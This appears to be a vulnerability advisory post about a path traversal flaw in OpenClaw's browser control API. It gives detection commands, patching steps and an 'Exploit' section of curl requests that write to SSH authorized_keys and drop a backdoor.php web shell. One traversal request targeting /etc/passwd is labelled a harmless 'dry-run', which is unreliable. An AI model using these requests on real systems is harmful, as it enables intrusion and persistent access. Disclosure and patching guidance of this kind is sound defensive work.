OpenClaw, Path Traversal, CVE-2026-XXXX (Medium)

Listen to this Post

The vulnerability resides in OpenClaw’s browser control API, specifically in the endpoints POST /trace/stop, POST /wait/download, and POST /download. Prior to version 2026.2.13, these endpoints accepted user-supplied paths for writing trace and download files without consistently validating that the destination remained within OpenClaw’s designated temporary directories. The API failed to properly neutralize path traversal sequences (like ../) or reject absolute paths. An attacker with access to the browser control API could exploit this by crafting a request that writes output files to arbitrary locations on the file system, such as sensitive system directories or configuration folders, bypassing the intended temp-root boundaries. The fix, implemented in commit `7f0489e` and merged on February 13, 2026, now enforces strict containment by validating all output paths against the OpenClaw-managed temp root and rejecting any traversal or escape attempts .
Platform: OpenClaw npm
Version: below 2026.2.13
Vulnerability: path traversal
Severity: medium
Date: February 13 2026

Prediction: Patched already

What Undercode Say:

Analytics

Check installed OpenClaw version
openclaw --version
Inspect logs for past exploitation attempts (path traversal patterns)
grep -E '(../|/etc/|/var/|/root/)' ~/.openclaw/logs/gateway.log | grep -E 'POST /(trace/stop|wait/download|download)'
Simulate a request to test if a system is vulnerable (dry-run, no file write)
curl -X POST http://localhost:PORT/trace/stop \
-H "Content-Type: application/json" \
-d '{"output_path": "../../../etc/passwd"}'
Check if fix commit is present in local installation (if source available)
git log --oneline | grep 7f0489e || echo "Fix commit not found"

Exploit

Crafted request to write a file outside the temp directory
curl -X POST http://localhost:18789/download \
-H "Authorization: Bearer YOUR_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"url": "https://example.com/file.pdf",
"output_path": "../../../home/user/.ssh/authorized_keys"
}'
Alternative for trace stop with traversal
curl -X POST http://localhost:18789/trace/stop \
-H "Authorization: Bearer YOUR_TOKEN" \
-d '{"output_file": "../../../../var/www/html/backdoor.php"}'

Protection

Upgrade to patched version (2026.2.13 or later)
npm install -g openclaw@latest
Verify upgrade
openclaw --version | grep -E "2026.2.(1[3-9]|2[0-9])" && echo "Patched version confirmed"
Enforce temp directory restrictions manually in config
echo "temp_uploads: /var/lib/openclaw/temp" >> ~/.openclaw/config.yaml
echo "enforce_temp_root: true" >> ~/.openclaw/config.yaml
Restrict API access to localhost only
sudo ufw deny 18789
Or bind only to loopback in config
echo "bind_address: 127.0.0.1" >> ~/.openclaw/config.yaml
Restart service
systemctl --user restart openclaw-gateway

Impact

A successful exploit allows an attacker with API access to write files anywhere the OpenClaw process has filesystem permissions. This can lead to:
– Overwriting critical system files or configuration
– Dropping web shells in web server directories
– Planting SSH authorized keys for persistent access
– Filling disk partitions via writes to arbitrary locations
– Bypassing intended audit trails by writing logs to unexpected paths
– Potential privilege escalation if combined with other vulnerabilities

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top